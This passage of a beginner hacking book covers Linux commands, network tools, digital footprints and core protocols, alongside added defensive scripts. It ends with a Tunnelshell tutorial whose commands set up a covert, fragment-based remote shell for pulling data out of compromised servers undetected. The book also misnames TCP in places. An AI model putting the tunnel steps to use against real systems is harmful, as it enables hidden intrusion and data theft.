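        | awk '{ for (i = 1; i <= NF; i++) if ($i == "from") print $(i + 1) }' \
        | sort | uniq -c | sort -rn | head -n 1 | awk '{ print $2 }'
}

# Stand-alone run: build the sample in a scratch directory and report.
demo_dir=$(mktemp -d)
make_sample_log "$demo_dir/auth.log"
write_reports "$demo_dir/auth.log" "$demo_dir"
write_reports "$demo_dir/auth.log" "$demo_dir"
echo "lines in log:           $(count_lines "$demo_dir/auth.log")"
echo "Failed (exact case):    $(count_failed_exact "$demo_dir/auth.log")"
echo "failed (any case):      $(count_failed_nocase "$demo_dir/auth.log")"
echo "not failures:           $(count_not_failed "$demo_dir/auth.log")"
echo "failures.txt lines:     $(count_report_lines "$demo_dir/failures.txt")"
echo "successes.txt lines:    $(count_report_lines "$demo_dir/successes.txt")"
echo "earliest failure at:    $(first_failure_time "$demo_dir")"
echo "worst source address:   $(top_failed_source "$demo_dir/auth.log")"
rm -r "$demo_dir"
```

The point of the case-sensitivity functions is that a log search that forgets -i misses a quarter of the failures in this sample; the point of the two report files is that > and >> look alike and behave very differently when the file already exists. The last pipeline is the same shape as the book's cat list1 list2 | grep p | sort, with two more stages added.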
Section Summary
Command                   Meaning
command > file            redirects the standard output to the named file
command >> file           appends the standard output to the named file
command < file            takes the standard input from the named file
command1 | command2       pipes the output of command1 into the input of command2
cat file1 file2 > file0   concatenates file1 and file2 into file0
sort                      sorts the data
who                       shows who is logged on to the system with you
Wildcards
* is a wildcard character and it matches zero or more characters in a file or directory name. For example, go to your linuxstuff directory and type in
% ls list*
This shows all the files in the current directory whose names begin with list
Now type in
% ls *list
This shows all the files in the current directory whose names end with list, which at this point means biglist and slist
? is another wildcard character and it matches exactly one character. So, for example, ?ouse would match names like mouse or house, but not grouse. Type in
% ls ?list
and see what happens: slist matches, because exactly one character comes before list, but biglist does not
Filename Conventions
It is worth noting that directories are a special type of file, so the naming conventions for files also apply to directories. Linux itself forbids only two characters in a file name: the slash (/) and the NUL character. Everything else, including *, ?, %, &, spaces and a leading dash, is allowed, but such names have to be quoted or escaped every time you use them, because the shell gives those characters a meaning of its own, and they are a common source of mistakes. So, when you name a file, stick to letters, digits, the underscore, the hyphen (not as the first character) and the dot.
Good names            Bad names
project.txt           project
my_big_program.c      my big program.c
bob_billy.doc         bob and billy.doc
File names conventionally begin with a lowercase letter and end with a dot and an extension that indicates the file's contents. For example, files containing C code usually have the .c ending, such as prog1.c.
To list all the files with C code in the home directory, all you need to type at the command prompt, from within the home directory, is ls *.c
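The Wildcards and Filename Conventions sections above describe what * and ? match and which names to avoid. The following added example (not from the book) shows both in action in a scratch directory: it counts what each pattern expands to, shows how an unquoted name with spaces falls apart into several words, and demonstrates why a name that begins with a dash is dangerous, since rm * in a directory containing a file called -rf turns into rm -rf followed by every other file name, and the -rf file itself survives. All file names below are constructed for the example, and the scratch directory is created and removed by the script.

```shell
# Added example, not from the book: what the shell actually does with the
# * and ? wildcards, and why the naming advice above (no spaces, no leading
# dash) protects you.  All file names are constructed; everything happens in
# a scratch directory that is passed in.

make_sample_dir() {                         # $1 = directory to populate
    mkdir -p "$1" || return 1
    ( cd "$1" || exit 1
      : > list1; : > list2; : > biglist; : > alist
      : > prog1.c; : > prog2.c
      : > 'my big program.c'                # legal, but the name holds spaces
      : > -rf )                             # legal, but the name starts with a dash
}

# It is the shell, not ls or rm, that expands a pattern into file names;
# the command only ever sees the resulting list.  Counting the words of
# that list shows what a pattern matched.  A pattern that matches nothing
# is left as it is, so the [ -e ] check turns that case into 0.
count_matches() {                           # $1 = directory, $2 = pattern
    ( cd "$1" || exit 1
      set -- $2                             # unquoted on purpose: expand it
      if [ -e "$1" ]; then echo "$#"; else echo 0; fi )
}

# An unquoted name with spaces is split into several words: to the command
# it looks like three files.  Quotes keep it as one.
count_words() { echo "$#"; }

# The trap behind "do not start a name with a dash": rm * becomes
# rm -rf alist biglist ... and rm treats -rf as options, not a file name.
# Every other file is deleted; the file called -rf survives, because it was
# never an operand.  (LC_ALL=C fixes the expansion order so -rf comes first.)
naive_remove() { ( cd "$1" || exit 1; export LC_ALL=C; rm * ); }

# The fix: -- ends option parsing, so everything after it is a file name.
# Writing ./* instead is the other common cure, since ./-rf is not an option.
safe_remove()  { ( cd "$1" || exit 1; rm -- * ); }

# Stand-alone run in a scratch directory.
demo=$(mktemp -d)
make_sample_dir "$demo"
echo "list*  matches $(count_matches "$demo" 'list*') names"   # list1 list2
echo "*list  matches $(count_matches "$demo" '*list') names"   # alist biglist
echo "?list  matches $(count_matches "$demo" '?list') names"   # alist only
echo "*.c    matches $(count_matches "$demo" '*.c') names"     # three, spaces and all
echo "unquoted name: $(count_words my big program.c) words; quoted: $(count_words 'my big program.c') word"
naive_remove "$demo"
echo "after rm *:    $(count_matches "$demo" '*') file(s) left"
safe_remove "$demo"
echo "after rm -- *: $(count_matches "$demo" '*') file(s) left"
rmdir "$demo"
```

The same trick works against any command whose options look like file names; that is why scripts that run a command over user-controlled file names should put -- before the names, or prefix them with ./, rather than trusting that nobody will create a file called -rf.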
Help
The manual pages provide information about every standard command. A page tells you what the command does, the options it takes and how each option changes its behaviour. To read the page for a specific command, type man followed by its name. For example, to know more about the wc command, you would type in
% man wc
Or you could type
% whatis wc
This gives a one-line description of the command, without any information about its options or anything else.
Apropos
When you do not know the exact name of a command, type in
% apropos keyword
This lists every command whose name or one-line manual description contains the keyword. Try typing:
% apropos copy
Section Summary
Command            Meaning
*                  matches any number of characters, including none
?                  matches exactly one character
man command        shows the manual page for the command
whatis command     gives a one-line description of the command
apropos keyword    lists the commands whose manual page description mentions the keyword
Command to execute: ls
Explanation: lists the contents of a directory.

Command to execute: pwd
Explanation: prints the current directory.

Command to execute: cd
Explanation: changes to the selected directory.

Command to execute: cp
Explanation: copies files.

Command to execute: mkdir
Explanation: creates a directory.

Command to execute: rmdir
Explanation: removes an empty directory.

Command to execute: touch
Explanation: creates an empty file, or updates the timestamp of an existing one.

Command to execute: tar
Explanation: packs files and directories into a single archive file, and unpacks such an archive.

Command to execute: clear
Explanation: clears the terminal screen.

Command to execute: adduser
Explanation: adds a new user account.

Command to execute: chmod
Explanation: changes the permissions of files and directories.

Command to execute: vi
Explanation: edits a file.

Command to execute: cat
Explanation: displays a file, or joins several files together.

Command to execute: grep
Explanation: searches files for particular patterns.

Command to execute: apt-get
Explanation: package management on Debian-based systems; for example, apt-get install followed by a package name.

Above is a list of the basic commands you should try out. They will help you carry out the exercises I will set in later chapters, so it is worth mastering them properly.

Network commands
Working as an ethical hacker requires a strong knowledge of the most common network commands.

In the rest of the book I will show you some of the most important ones. Try them out, and you may well end up creating new combinations.

Command to execute: ifconfig
Explanation: utility to configure network interfaces and to view the IP address assigned to a machine. On current distributions it is considered obsolete and may not even be installed; ip addr, from the iproute2 package, shows the same information.

Command to execute: traceroute
Explanation: traces the path an IP packet takes to a destination host, hop by hop. It is very useful for troubleshooting, for example to see at which point along the path packets stop or are lost.

Command to execute: dig
Explanation: a utility for querying DNS. You will understand its mechanisms better in the next few chapters, where I explain what DNS is and how an attack against it can be organised.

Command to execute: telnet
Explanation: makes a connection to a remote host using the TELNET protocol. Be aware that everything sent over this protocol, the login password included, travels in clear text without any encryption, so anyone who can see the traffic can read it. For this reason it is not a secure protocol, though it remains handy for talking to a plain-text service by hand.

Command to execute: nslookup
Explanation: another utility for querying DNS, including reverse lookups (from an IP address back to a name). We will use this command often in our exercises.

Command to execute: netstat
Explanation: a command of the utmost importance. It shows the network connections open at a given moment and the ports the machine is listening on. It is useful in troubleshooting, to check for connections that were never established or have been lost, and when reviewing a machine for services that should not be there. On current distributions it is being replaced by ss, which takes similar options (ss -tulpn lists the listening sockets with the owning process). Take some time to get to know this tool.

Command to execute: ifup, ifdown
Explanation: bring a network interface up or down. Useful, for example, when the network configuration has changed and the interface needs to be restarted.

Command to execute: ping
Explanation: checks whether a host is reachable by sending it ICMP echo request packets and waiting for the echo replies. Note that some hosts and firewalls drop these packets, so the absence of a reply does not prove that a host is down.

Command to execute: arp -a
Explanation: shows the ARP table, the machine's current mapping between IP addresses and MAC addresses on the local network. It is useful for ruling out problems at the lower levels of the ISO/OSI model (the data link layer).

These are the commands related to networking. Of course the list is not complete; there would be much more to say. But you will do fine later on if you start getting familiar with these commands.
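The netstat entry above says the command is used to verify anomalies; the following added example (not from the book) shows what that looks like as a check rather than a glance. It parses a listening-socket table laid out like the output of netstat -tuln (the output of ss -tuln on newer systems has the same information in a similar layout), lists which ports are reachable from the network rather than bound to loopback, and reports any listening port that is not on a baseline of expected services. The table, its ports and addresses are constructed for the example and describe no real machine.

```shell
# Added example, not from the book: turning netstat's listening-socket table
# into a check.  The table below is constructed to look like "netstat -tuln"
# output; the services, ports and addresses are made up for the example.

make_sample_netstat() {                     # $1 = file to write
    cat > "$1" <<'EOF'
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN
tcp6       0      0 :::80                   :::*                    LISTEN
udp        0      0 0.0.0.0:68              0.0.0.0:*
EOF
}

# Keep only socket lines (protocol tcp, tcp6, udp or udp6), split the local
# address into bind address and port (the port is whatever follows the last
# colon, which also copes with the :::80 form used for IPv6), and print
# "proto address port" for each listener.
listeners() {                               # $1 = netstat output file
    awk '$1 ~ /^(tcp|udp)6?$/ {
             n = split($4, a, ":"); port = a[n]
             addr = substr($4, 1, length($4) - length(port) - 1)
             print $1, addr, port }' "$1"
}
listener_count() { listeners "$1" | wc -l | tr -d ' '; }

# Ports bound to every interface (0.0.0.0 or ::) are reachable from the
# network; a loopback-only service such as 127.0.0.1:3306 is not.
network_exposed() {                         # $1 = file; prints the ports, space separated
    listeners "$1" | awk '$2 == "0.0.0.0" || $2 == "::" { out = out (out == "" ? "" : " ") $3 }
                          END { print out }'
}

# Compare what is listening with a baseline of what should be listening.
# Whatever is not on the list is what you go and look at first.
unexpected_listeners() {                    # $1 = file, $2 = baseline such as "22 80 3306"
    listeners "$1" | awk -v allow="$2" '
        BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        !($3 in ok) { out = out (out == "" ? "" : " ") $3 }
        END { print out }'
}

# Stand-alone run.
tmp=$(mktemp)
make_sample_netstat "$tmp"
echo "listening sockets:      $(listener_count "$tmp")"
echo "reachable from network: $(network_exposed "$tmp")"
echo "not in baseline:        $(unexpected_listeners "$tmp" '22 80 3306 68')"
rm -f "$tmp"
```

On a real machine you would replace the sample file with the live output (netstat -tuln > file, or ss -tuln, whose columns are ordered differently and would need the awk field numbers adjusted) and keep the baseline under version control, so that a new listener shows up as a diff rather than something you have to notice by eye.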

Commands related to system management

Command to execute: uptime
Explanation: shows how long the system has been running, together with the number of logged-in users and the load averages.

Command to execute: users
Explanation: shows the user names of the users currently logged in to the system.

Command to execute: who / whoami
Explanation: who lists the users logged in to the system, with their terminal, login time and origin; whoami prints the user name you are currently working as, which matters once you have switched user.

Command to execute: crontab -l
Explanation: displays the scheduled jobs of the current user. We will see later what these jobs are. They are worth reviewing when checking a machine, since they run without anyone being logged in.

Command to execute: less / more
Explanation: very useful for quickly viewing a file one screen at a time. Press the q key to leave the viewer.

Command to execute: ssh
Explanation: connects to a remote host using the SSH protocol. Unlike TELNET, SSH encrypts the session, so anyone intercepting the traffic cannot read the data or the credentials.

Command to execute: ftp
Explanation: connects to an FTP server using the FTP protocol. FTP does not encrypt anything, the user name and password included, so take care when using it; sftp and scp do the same job over SSH.

Command to execute: service start / stop
Explanation: starts or stops a service; the full form is service followed by the service name and then start or stop. On distributions that use systemd the equivalent is systemctl with the same verbs. You will use this on many occasions.

Command to execute: free -h
Explanation: shows the amount of free and used memory in human-readable units. Useful, for example, when a machine has performance problems.

Command to execute: top
Explanation: shows the active processes in the system, updated continuously, with their processor and memory use. Useful when a machine is running very slowly for no apparent reason.

Command to execute: ps
Explanation: lists the processes running in the system; ps aux or ps -ef shows all of them, with their owners and PIDs.

Command to execute: kill
Explanation: terminates a process. You first need to find the PID of the process, for example with ps. By default kill sends the TERM signal, which asks the process to exit cleanly; kill -9 sends KILL, which the process cannot catch or ignore, so use it only when the polite version did not work.
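The ps and kill entries above say that you must find the PID first and then terminate the process. The following added example (not from the book) does that the careful way: it looks the PID up by exact command name, sends TERM, waits a little, and falls back to KILL only if the process is still there. Instead of calling ps it reads the same /proc entries that ps itself reads, so it runs on any Linux system even where the procps tools are not installed; pgrep -x or ps -eo pid,comm would give the same list. The process it stops is a harmless sleep that the script starts for the purpose.

```shell
# Added example, not from the book: find a process by name and stop it,
# politely first (TERM) and forcibly (KILL) only if that did not work.
# Reads /proc directly, which is where ps gets its information; on a system
# with procps installed, "pgrep -x NAME" gives the same PIDs as pids_of.

# PIDs of every process whose command name is exactly $1.  The exact
# comparison matters: a substring match for "ssh" would also hit "sshd".
pids_of() {                                  # $1 = command name
    for d in /proc/[0-9]*; do
        [ -r "$d/comm" ] || continue
        if [ "$(cat "$d/comm" 2>/dev/null)" = "$1" ]; then
            echo "${d#/proc/}"
        fi
    done
}

# True if the process exists and is not a zombie.  The state letter is the
# field after the ")" that closes the command name in /proc/PID/stat; a
# zombie ("Z") has already exited and only its exit status is left behind.
is_alive() {                                 # $1 = pid
    [ -r "/proc/$1/stat" ] || return 1
    state=$(sed 's/^.*) //' "/proc/$1/stat" | cut -d' ' -f1)
    [ "$state" != "Z" ]
}

# Send TERM (what plain "kill PID" sends), wait up to $2 seconds for the
# process to exit on its own, then send KILL (what "kill -9" sends) if it is
# still running.  Returns 0 if the process is gone afterwards, 1 if not.
terminate_pid() {                            # $1 = pid, $2 = seconds to wait
    is_alive "$1" || return 0                # nothing to do
    kill -s TERM "$1" 2>/dev/null || true
    i=0
    while [ "$i" -lt "$2" ] && is_alive "$1"; do
        sleep 1
        i=$((i + 1))
    done
    if is_alive "$1"; then
        kill -s KILL "$1" 2>/dev/null || true   # last resort: cannot be caught
        sleep 1
    fi
    ! is_alive "$1"
}

# Stand-alone run: start a throw-away "sleep", find it, and stop it.
sleep 300 &
target=$!
echo "PIDs named sleep: $(pids_of sleep | tr '\n' ' ')"
if terminate_pid "$target" 3; then
    echo "PID $target stopped"
else
    echo "PID $target survived even KILL"
fi
```

The wait between the two signals is the whole point: TERM lets a service flush its logs and close its files, while KILL ends it mid-write, so a script that reaches straight for kill -9 trades a clean shutdown for a faster one. A process that survives KILL is almost always stuck in the kernel (for example on a hung network file system) and needs the underlying problem fixed, not another signal.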
Chapter 3 : What is the use of logging for hackers

Day by day, mostly without our knowledge, our Internet use contributes to a growing portrait of who we are online. This portrait is more public than you might think. Whenever we look to the Internet for information, the Internet seems to be looking back at us. We always leave something behind when we use websites to gather information, send emails or messages, share on social media and so on. All the traces we leave on the Internet are termed digital footprints.
Digital footprints bring both benefits and costs. They offer the convenience of saving time, for example by auto-filling your personal details when you log in to an account, so that you do not have to retype them. Most users of several companies' services realise that they are sharing information consciously on social media sites; by uploading pictures, you give up some degree of privacy. Footprints are also created by default when you shop online or search for something, and even by enabling location services. And if you cannot see a footprint, you cannot manage it. Companies use this portrait to target specific content at specific markets and consumers; employers use it to look into employees' backgrounds; advertisers use it to track users' movements across websites. In simple words, whenever you go online and do something, you leave a digital footprint behind.
There are different kinds of digital footprints, and it is wise to know about them and their effects.
You should know that you can never bring your footprint down to zero, but following a few steps can reduce it, and with those steps managing your digital identity will not be hard.
Basically, a user's digital footprints are the traces they leave behind. Comments you make on social websites like Facebook, email and application use, Skype calls and so on all leave footprints, and much of this is stored in databases that other people can query. Here are some of the ways that you leave digital footprints.
Websites and Online Shopping
Product review sites and retailers often leave cookies on your computer. These cookies store information about you and can be used to track your movements from site to site; advertising companies use them to display advertisements related to your recent web searches.

Social Media
Every comment on Facebook, tweet on Twitter and +1 on Google+ leaves a digital footprint. You can control these by keeping an eye on the privacy settings of your social media sites: the defaults change as new policies and settings are released, and the changes usually make more of your data visible. Most people click OK at the end of a policy agreement without reading it.

Laptops, Tablets and Mobile Phones


Some websites keep a list of the devices you have used to log in to them. That information is there to secure your account, but you should know that, as well as protecting you, they are also storing information about your habits.

How Big Is My Footprint?


If you are interested in how big your digital footprint is, there are several tools available online. They are easy to get, can be added to your system and help you monitor and control your footprint. Google is one of the companies most often accused of collecting large amounts of user data. You can also gauge the size of your footprint by looking at how many advertising companies are permitted to track your browsing habits. You may not recall permitting any of them to place cookies on your computer; some sites do it without asking. Cookies are small chunks of data created by web servers, stored on your computer and sent back by your browser on later visits. The websites you visit frequently save your preferences, along with your online patterns, in these cookies and use the information to personalise your experience.
Another way to get a simple estimate of your footprint is the Digital Footprint Calculator, which EMC Corporation provides for both the Microsoft Windows and Mac operating systems. You enter how often you upload photos and videos, use the phone, browse the web and send emails, together with your location, and the calculator turns all of this into an estimated file size for your presence on the Internet.
Here are 10 steps that will help you to erase your digital footprint.

1. Search yourself.
Searching for applicants on the Internet has become customary practice for employers before recruiting them. All of this information is served up by search engines like Google and can be seen by anyone who searches for you. If you search for yourself, you are likely to find all the websites on which you have an account; search for images too. Understanding your footprint is the first step towards controlling it.

2. Deactivate your old social media accounts and check the privacy settings.
Facebook, Google+, LinkedIn, Twitter, MySpace and the like can all be mined for personal information. If your privacy settings are not tight, viewers can see the pictures, status updates and posts from your personal life. Remember that the open web forgets context, and your posts can be misconstrued; something that happened years ago can hamper your prospects today. Although your personal life is separate from your professional life, the people trying to hire you may not see it that way. So always check the privacy settings of the accounts you are active on. On Facebook, for example, go to the account settings at the top right of the page and select the privacy option from the list. There you can decide who can see your information, who can look you up by your mobile number or email address, and so on.

On Twitter, you reach the settings by clicking your avatar at the top right of your profile. This gives you a range of account options, including making your profile private. Leaving out your last name, or using a different one, makes the account much harder to link to you.

3. Hide other information or add false information.


Honesty is not the best policy when it comes to social media accounts if you wish to keep a low profile. Some social media sites only allow you to deactivate your account, not to delete it completely. In such cases, change as much of your information as possible, including the profile name, email address and profile picture, before you deactivate the account. Anyone who then searches for you will only find the information you changed it to.

4. Contact webmasters
Contacting a website's webmaster is one of the best ways to get your information removed. Write to them explaining your situation in detail, and if they find your reason valid they may help you remove it. You will have to prove that the account is yours, for example by calling from the phone number registered on it or writing from the registered email address.

5. Unsubscribe from mailing lists.


Always keep in mind that a mailing list leaves a trail back to you. By unsubscribing from such mailing lists, you break those connections. Doing this will help you de-clutter your
primary inbox as well.

6. Have a secondary email account.


Most services nowadays require your email address in order to sign up before using a website. For registering on such websites, it is wise to create a secondary email account instead of giving
your primary email address. They sometimes insist on sending you emails for their sales pitches and marketing campaigns. By using your secondary email address, you can keep your digital
footprint clean.

7. Consider the “right to be forgotten.”


European countries have recently implemented the “right to be forgotten” policy. Using this policy, you can have your information removed from the search engines that publicly display it.
Google has removed many such links.

8. Check e-commerce and retail accounts.


In cases where you are not using your retail accounts like eBay or Amazon, or in cases where you have created a new account and stopped using your old account, consider removing those
accounts and your financial data saved in them. Cyber-attacks have become common on major retailers and their services. If you are not using those accounts, there is no point in keeping your
sensitive data on the company's servers. It is wise to remove them.

9. Cover your tracks.


Big IT companies like Apple and Google recently stated that they would be enhancing the basic encryption in their services. With this, there are a number of ways to make yourself less
traceable. Despite the claims of startups on the anti-NSA bandwagon, you should know that there is no complete solution that makes you surveillance-proof. For normal usage, the private browsing
mode provided by Internet Explorer, the incognito mode of Google Chrome and Firefox's private window will definitely help you limit traceable data like cookies.

10. Make a fresh start.


This can be considered an extreme action where you delete all the aforementioned services, delete all the emails in your inbox, etc. For removing your digital footprint, this is considered the best
way. Though only a little will be forgotten, falsifying your name on the social media accounts you use, setting tighter security settings, and clearing your e-commerce accounts and the emails
from your inbox will definitely contribute to clearing your presence from the web.
The Big Three Protocols - Required Reading for Any Would-Be Hacker
In this chapter, I will give you an overview of ICMP, TCP, and UDP, the three most important protocols. Later, I will show how to create a covert channel that is pretty much undetectable using
Tunnelshell and Kali Linux.
ICMP – Internet Control Message Protocol
ICMP is used by devices like routers to report errors and generate messages that go to the source IP. The messages inform the sender when an error stops IP packets from being delivered. ICMP creates
the messages and sends them, indicating that a service, router or host cannot be reached through a gateway to the internet. Any IP network device can send these messages, and can receive and process
them. ICMP is not classed as a transport protocol for sending data from one system to another.
ICMP doesn’t tend to be used regularly in end-user applications; it is widely used by network admins for troubleshooting internet connections. Because it is one of the main protocols, ICMP
tends to be used by hosts, routers or intermediary devices to tell other devices, hosts or routers of any errors or updates. IPv4 and IPv6 use similar versions called ICMPv4 and ICMPv6.
ICMP messages are sent as datagrams and have an IP header that holds the data. An ICMP packet is an IP packet that carries ICMP within the IP data section. ICMP error messages also include the IP header
from the original message so that the receiver always knows which packet failed. The ICMP header follows the IPv4 or IPv6 packet header and is identified by IP protocol number
1. The header has three fields:
The type, which identifies the ICMP message
The code, which gives more information regarding the type field
The checksum, used to find errors introduced while the message is in transit
After these fields come the ICMP data and the IP header, showing which packet has failed. ICMP has also been used as a way of executing DoS attacks by sending IP packets that are
larger than the maximum number of bytes the IP protocol allows.

TCP – Transfer Control Protocol


TCP is the defining standard for establishing and maintaining network conversations in which applications exchange data. TCP works with the IP protocol, and together they define the way
computers send data packets to one another. Working together, IP and TCP are the rules by which the internet is defined. TCP is a connection-oriented protocol, meaning the connection,
once established, is maintained until the applications at either end have completed the exchange of messages. TCP determines how the application data should be broken down into packets
that can be delivered by networks. It also sends packets to the network layer and accepts packets from it, manages flow control and, because it is designed to provide data
transmission that is free from errors, handles the retransmission of packets that are garbled or dropped as well as acknowledging all the packets as they arrive.
TCP is responsible for covering parts of the Transport Layer (layer 4) and parts of the Session Layer (layer 5) in the OSI (Open Systems Interconnection) communication model. For example,
web servers use the HTTP protocol to send HTML files to clients. The HTTP program layer requests that the TCP layer set up the connection and send the file. The TCP stack then
divides that file into packets of data, gives each one a number and sends them on, one at a time, to the IP layer so they can be delivered. While each of the packets has the same source IP
and the same destination IP, they may go via several routes. The TCP layer on the client system waits for all the packets to arrive, acknowledges them, puts them back together as a
file and sends it to the receiving application.
UDP – User Datagram Protocol
UDP is an alternative to TCP and is used mostly for establishing connections that are loss-tolerant and low-latency. These connections are between internet applications. Both TCP and UDP run
atop the Internet Protocol and are often referred to as TCP/IP or UDP/IP. Both protocols send datagrams, which are short data packets.
UDP provides services that IP doesn’t: port numbers, which help to distinguish between different requests from users, and a checksum, the capability to check that the data arrives in one piece.
TCP is the dominant protocol for most of the internet connectivity and this is down to the fact that it can break large data packets into individual ones, check for lost packets and resend them, and
then reassemble them in the right order. However, this comes at a cost of extra overhead in terms of data and latency delays. By contrast, UDP only sends the packets and that means it takes less
bandwidth and suffers lower latency. However, it is possible for data to be lost or received in the wrong order and this is due to the fact that the individual packets take several routes.
UDP is ideal for network applications where latency is critical, like video and voice communication or gaming, where data can be lost without affecting the quality too much. Occasionally,
forward error correction techniques are used to provide better video and audio quality, even though some data has been lost.
UDP is also used where applications need lossless transmission of data, where the application has been configured to manage the retransmission of lost packets and the ordering of packets
that are received. This helps to boost the data transmission rate for large files when compared to TCP.
How to Use Tunnelshell To Create a Covert Channel That Is Almost Undetectable:
More often than not, professional hackers are looking for protected information from a target network or system. This could be bank details, credit or debit card numbers, information that is
personally identifiable or intellectual property, like designs, blueprints, plans, etc. While you might be able to get into that system, the question is, what do you do when you are in there?
Hackers need a way to get the information they have gleaned out of the network or system and they want to do this in a way that is not detectable by any security services or security admin. I am
going to show you how to use a tool called Tunnelshell to get data out of a network with next to no chance of detection.
How Tunnelshell Works
Tunnelshell is a neat program that will only work on Linux or UNIX servers that have been compromised. A high percentage of corporate servers run on a UNIX distribution, such as Linux,
Solaris, IRIX, HP-UX, AIX, etc., so there shouldn’t be any significant problems in removing data using Tunnelshell. However, it will only work on the big servers, not a small or even a medium
one that runs on Windows Server.
Tunnelshell works over several protocols, including UDP, TCP, RawIP and ICMP. It is also able to break packets up so it can get past an intrusion detection system and a firewall. In UDP and
TCP modes, Tunnelshell does not need to be bound to a port or a socket so, if the target were to run netstat, it wouldn’t show any open ports – it would show up in the process list though. In TCP
mode, no IP address is logged because no three-way handshake is completed.
In ICMP mode, Tunnelshell uses ICMP Echo Request/Echo Reply to transport data and, because of this, it shows up as a continuous ping between the two systems. Many firewalls and
routers block incoming ICMP but they rarely block outgoing ICMP, because ping is needed by admins and users to find the active hosts.
How to Use Tunnelshell for a Covert Channel
You will need to download Kali for this, and Tunnelshell is not included – it isn’t possible for the developers to include everything. This tutorial will show you how to build a tunnel between Kali
and a Linux system that has been compromised. We are going to use BackTrack 5r3 as the target, but you can use any Linux or Unix distribution.
Open Kali
The first step is to download Tunnelshell. Under normal circumstances we would use the apt-get command or the Add/Remove Software utility on Kali but, as Tunnelshell isn’t in Kali, we can’t
do either. The easiest way is to go straight to the website and download it.
So, open http://packetstormsecurity and download Tunnelshell – it is a compressed .tar file with the extension .tgz. This means it must be uncompressed and untarred before it can be used. It must
be downloaded onto the target system and to your own Kali system. Put it in whatever directory you want so long as you remember where it is and remember to run the commands from that
directory.
Untar and Uncompress
Type the following command in at the prompt to unpack Tunnelshell:
kali > tar xvfz tunnelshell_2.3.tgz
Type the following command to compile the tool:
kali > make
Activate Tunnelshell on the Target
Now that Tunnelshell has been downloaded and compiled on the target, all you need to type at the prompt is:
kali > ./tunneld
This will open the server on the target. As no switches were used when Tunnelshell was activated, it will use packet fragmentation in the default configuration. The beauty of this is that packets
are broken down into pieces and reassembled when they reach the destination and this is one of the best methods for getting past almost every IDS and firewall without being detected.
Connect to the Tunnel
To do that just type:
kali > ./tunnel -t frag 192.168.89.191
● -t is the switch that goes before the tunnel type
● frag defines the type
● 192.168.89.191 is the target IP address in this case
Tunnelshell will now connect but you won’t get a command prompt; instead, you get a blank line. Now you can type in any Linux command and the output will be returned as if you were
working at the Linux prompt. For example, type in pwd for Present Working Directory, and the return will be the directory that tunnel is running in on the target. If you now type in ls -l, you will get
a listing of the directory, and you can go ahead and input any Linux command you want.
Attempt to Detect Tunnelshell on the Target
Now you have your tunnel, it’s time to see if the target is able to detect it. Go to the target system and, as sysadmin, see if you can find the tunnel. Try it with netstat – this shows all connections on
the computer, but you should not be able to see Tunnelshell.
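The ICMP header fields described earlier (type, code, checksum) and the "continuous ping" that ICMP mode produces both lend themselves to a check a sysadmin can run alongside netstat. The following Python is an added example, not code from the book or from Tunnelshell: it parses ICMP messages, verifies the checksum, and flags any echo reply whose payload does not repeat the matching request, since a genuine reply returns the request's data unchanged. The sample messages are constructed inline.

```python
import struct
from typing import Dict, List, Tuple

ECHO_REPLY, ECHO_REQUEST = 0, 8


def internet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum, the third field of the ICMP header."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_icmp(message: bytes) -> dict:
    """Split an ICMP echo message into type, code, checksum, id, sequence and payload."""
    if len(message) < 8:
        raise ValueError("ICMP message shorter than the 8-byte echo header")
    icmp_type, code, checksum, ident, seq = struct.unpack("!BBHHH", message[:8])
    # The checksum covers the whole message with the checksum field itself zeroed.
    zeroed = message[:2] + b"\x00\x00" + message[4:]
    return {"type": icmp_type, "code": code, "checksum": checksum,
            "id": ident, "seq": seq, "payload": message[8:],
            "checksum_ok": internet_checksum(zeroed) == checksum}


def build_echo(icmp_type: int, ident: int, seq: int, payload: bytes) -> bytes:
    """Assemble a well-formed echo request/reply; used here only to construct sample input."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = internet_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload


def audit_echo_traffic(messages: List[bytes]) -> List[str]:
    """Return one alert per suspicious message: a bad checksum, an unsolicited reply, or a
    reply whose data differs from its request. RFC 792 requires an echo reply to carry the
    request's data back unchanged, so a differing payload is not an ordinary ping."""
    alerts = []
    pending: Dict[Tuple[int, int], bytes] = {}   # (id, seq) -> request payload
    for raw in messages:
        m = parse_icmp(raw)
        key = (m["id"], m["seq"])
        if not m["checksum_ok"]:
            alerts.append("bad checksum on type=%d id=%d seq=%d" % (m["type"], *key))
        if m["type"] == ECHO_REQUEST:
            pending[key] = m["payload"]
        elif m["type"] == ECHO_REPLY:
            request = pending.pop(key, None)
            if request is None:
                alerts.append("unsolicited echo reply id=%d seq=%d" % key)
            elif request != m["payload"]:
                alerts.append("echo reply id=%d seq=%d payload differs from request (%d vs %d bytes)"
                              % (key[0], key[1], len(request), len(m["payload"])))
    return alerts


# Constructed sample traffic (not a real capture): one ordinary ping exchange, then a
# request whose reply carries different bytes, then a request with a corrupted byte.
PING_DATA = bytes(range(0x10, 0x38))   # byte pattern an ordinary Linux ping sends after its timestamp
SAMPLE = [
    build_echo(ECHO_REQUEST, 0x1234, 1, b"\x00" * 8 + PING_DATA),
    build_echo(ECHO_REPLY, 0x1234, 1, b"\x00" * 8 + PING_DATA),
    build_echo(ECHO_REQUEST, 0x1234, 2, b"\x00" * 8 + PING_DATA),
    build_echo(ECHO_REPLY, 0x1234, 2, b"/home/user\n"),
    build_echo(ECHO_REQUEST, 0x1234, 3, PING_DATA)[:-1] + b"\xff",
]

if __name__ == "__main__":
    for alert in audit_echo_traffic(SAMPLE):
        print(alert)
```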
Other Configurations
We used Tunnelshell’s default configuration for fragmented packets, but it can also use other configurations, which could be more useful depending on the circumstances:
ICMP
To run in ICMP, start the server by typing:
./tunneld -t icmp -m echo-reply
And start the client by typing:
./tunnel -t icmp -m echo-reply, echo <IPaddressoftarget>
UDP
Start the server by typing:
./tunneld -t udp -p 53, 2000
Start the client by typing:
